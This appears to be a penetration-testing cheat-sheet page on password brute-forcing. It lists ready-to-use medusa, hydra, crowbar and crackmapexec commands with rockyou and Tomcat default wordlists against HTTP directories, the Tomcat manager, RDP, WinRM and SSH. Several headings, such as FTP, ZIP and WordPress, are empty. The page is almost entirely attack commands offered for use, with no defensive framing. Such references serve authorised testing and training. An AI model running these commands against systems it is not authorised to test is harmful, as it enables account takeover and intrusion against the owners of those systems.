Page cover

Bruteforce

Medusa

medusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

Tomcat GET:

hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<IP>:8080/manager/html

RDP:

crowbar -b rdp -s <IP> -u <admin> -C rockyou.txt -n 1

Evil-winrm:

 crackmapexec winrm <IP> -d <domain> -u users.txt -p password.txt

SSH:

hydra -l <user> -P /usr/share/wordlists/rokyou.txt <ssh>://<IP> -s <port>
hydra -l <user> -P /usr/share/wordlists/metasploit/unix_passwords.txt <IP> ssh -t 4 -V

HTTP-GET

hydra -l <user> -P /usr/share/wordlists/rockyou.txt http-get://<IP>

HTTP-POST

FTP

ZIP

Unshadow

WordPress

ASC

Last updated